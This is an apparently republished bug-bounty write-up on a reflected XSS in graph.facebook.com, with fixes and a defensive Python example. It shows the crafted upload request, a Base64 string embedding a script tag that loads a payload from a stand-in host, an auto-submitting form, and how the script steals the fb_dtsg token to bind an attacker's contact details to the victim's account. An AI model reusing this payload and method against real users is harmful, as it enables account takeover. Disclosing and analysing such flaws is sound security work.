How to use reflective XSS in graph.facebook.com to realize Facebook account hijacking

2025-03-30 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article describes how a reflected XSS in graph.facebook.com could be used to hijack a Facebook account. The editor considers it very practical and shares it here in the hope that readers take something away from it.

Described below is a reflected XSS vulnerability in graph.facebook.com. An attacker could construct a malicious link, lure a victim into visiting it, and then add an attacker-controlled e-mail address or mobile phone number to the victim's account, thereby hijacking it.

Vulnerability situation

This vulnerability only works in IE and Edge, because some API endpoints on graph.facebook.com did not fully escape HTML when reflecting it in their responses. The response is JSON, with the HTML included as the value of one of the fields, and it carried neither a Content-Type nor an X-Content-Type-Options header, which gave me a chance to reach code execution in IE/Edge: these two browsers scan the whole page body when sniffing the MIME type, whereas other browsers only inspect the first few characters.

Vulnerability reproduction

1. First, we send the following POST upload request:

POST /app/uploads
Host: graph.facebook.com

access_token=ACCESS_TOKEN&file_length=100&file_type=PAYLOAD

ACCESS_TOKEN is a valid user access token issued to the first-party Facebook for Android application, and PAYLOAD is the HTML we want to have reflected so that the victim's browser executes it. When the request is submitted, the server returns a response like the following, containing a session ID that is used later (for more information, refer to the official Facebook documentation):

{"id": "upload:MTphdHRhY2htZW50Ojlk2mJiZxUwLWV6MDUtNDIwMy05yTA3LWQ4ZDPmZGFkNTM0NT8=?sig=ARZqkGCA_uQMxC8nHKI"}

Testing showed that the response carried no Content Security Policy (CSP), so I wondered whether I could insert HTML that loads an externally hosted JavaScript file, such as:

2. The Facebook backend Base64-encodes the upload parameters into the session ID it returns, so the response now contains the payload we implanted:

Upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s

This encoded string therefore yields the following URL on graph.facebook.com, to which a POST request can be sent:

https://graph.facebook.com/upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s

3. Using the request URL above together with the valid access_token generated in step 1, I built an HTML page and hosted it on my own website:

document.forms[0].submit()

The page contains a form that submits itself automatically; after the victim visits it, the response is as follows:

{"h": "2:::GVo0nVVSEBm2kCDZXKFCdFSlCSZjbugbAAAP:e:1571103112:REDACATED:REDACATED:ARCvdJWLVDpBjUAZzrg"}

Crucially, the script at https://DOMAIN.com/script.js steals the victim's "fb_dtsg" CSRF token and sends a binding request to https://www.facebook.com/api/graphql/ that adds a phone number or e-mail address to the account, which indirectly hijacks the victim's account.

Vulnerability fix

1. Escape HTML in the file_type parameter before reflecting it in any response.

2. Add a "Content-type: application/json" header to every response so that browsers cannot sniff the body as HTML.
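The two root causes described above (an unescaped reflected value and a JSON response with no Content-Type or X-Content-Type-Options header) and the two fixes just listed can be shown side by side. The following is an added example written for this article, not Facebook's code: the upload ID is a labelled placeholder, the reflected input is a constructed sample, and the audit function returns the findings a reviewer would raise for a given response.

```python
import html
import json
import re

# Constructed sample input standing in for a reflected file_type value;
# the article's real payload is deliberately not reproduced here.
SAMPLE_INPUT = "<b>sample</b>"

# Placeholder for the opaque session ID the backend generates.
UPLOAD_ID_PLACEHOLDER = "upload:PLACEHOLDER_ID"

# Matches an HTML tag opener such as <b, </b, <html or <!--.
TAG_OPENER = re.compile(r"<\s*[A-Za-z!/]")


def weak_upload_response(file_type):
    """Mirror the flaw: the value is reflected unescaped and the response
    carries no Content-Type and no X-Content-Type-Options header."""
    body = json.dumps({"id": UPLOAD_ID_PLACEHOLDER + "?file_type=" + file_type})
    return {}, body


def hardened_upload_response(file_type):
    """Apply both fixes: HTML-escape the reflected value, pin the MIME type,
    and add nosniff so IE/Edge cannot reinterpret the body as HTML."""
    safe_value = html.escape(file_type, quote=True)
    body = json.dumps({"id": UPLOAD_ID_PLACEHOLDER + "?file_type=" + safe_value})
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def audit_response(headers, body):
    """Return the list of problems a JSON API response exhibits; an empty
    list means the response is safe against MIME sniffing to HTML."""
    findings = []
    lowered = {k.lower(): v for k, v in headers.items()}
    if not lowered.get("content-type", "").lower().startswith("application/json"):
        findings.append("missing or non-JSON Content-Type")
    if lowered.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    if TAG_OPENER.search(body):
        findings.append("unescaped HTML markup in body")
    return findings


if __name__ == "__main__":
    print("weak:    ", audit_response(*weak_upload_response(SAMPLE_INPUT)))
    print("hardened:", audit_response(*hardened_upload_response(SAMPLE_INPUT)))
```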

That is how the reflected XSS in graph.facebook.com could be used to hijack a Facebook account. The editor believes it contains points that may come up in daily work, and hopes readers learn something from it. For more details, please follow the industry information channel.


© 2024 shulou.com SLNews company. All rights reserved.
